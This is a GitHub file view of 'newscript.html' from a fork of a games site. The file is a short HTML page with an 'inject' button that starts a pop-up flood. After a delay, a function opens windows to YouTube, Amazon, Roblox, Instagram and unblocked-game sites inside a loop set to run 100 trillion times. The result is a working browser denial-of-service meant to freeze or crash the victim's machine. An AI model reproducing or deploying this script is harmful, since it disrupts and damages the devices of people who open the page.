forked from sayofthelor/sz-games.github.io
-
Notifications
You must be signed in to change notification settings - Fork 0
/
newscript.html
41 lines (31 loc) · 1.36 KB
/
newscript.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<html>
<head>
new script inject
<button onclick="s()">inject </button>
<script>
const n = 100000000000000;
function lag() {
window.open("https://www.youtube.com/watch?v=Cd1iF6tSuBs&ab_channel=HillsBrosProductions", "", "width=500,height=500");
for (let i = 1; i <= n; i++) {
window.open("https://amazon.com", "", "width=500,height=550");
window.open("https://youtube.com", "", "width=500,height=600");
window.open("https://krunker.io", "", "width=500,height=650");
window.open("", "https://krunker.io", "width=500,height=700");
window.open("", "https://twitter.com", "width=500,height=750");
window.open("", "https://roblox.com", "width=500,height800");
window.open("", "https://krunker.io", "width=500,height=850");
window.open("", "https://instagram.com", "width=500,height=900");
window.open("", "https://sites.google.com/view/fnf-unblockedhehe/fnf-neo-ver-2", "width=500,height=950");
window.open("", "https://fnf.kdata1.com/hex-weekend/2/", "width=500,height=1000");
window.open("", "", "width=500,height=1050");
}
}
function s() {
var delayInMilliseconds = 300;
setTimeout(function() {
lag();
}, delayInMilliseconds);
}
</script>
</body>
</html>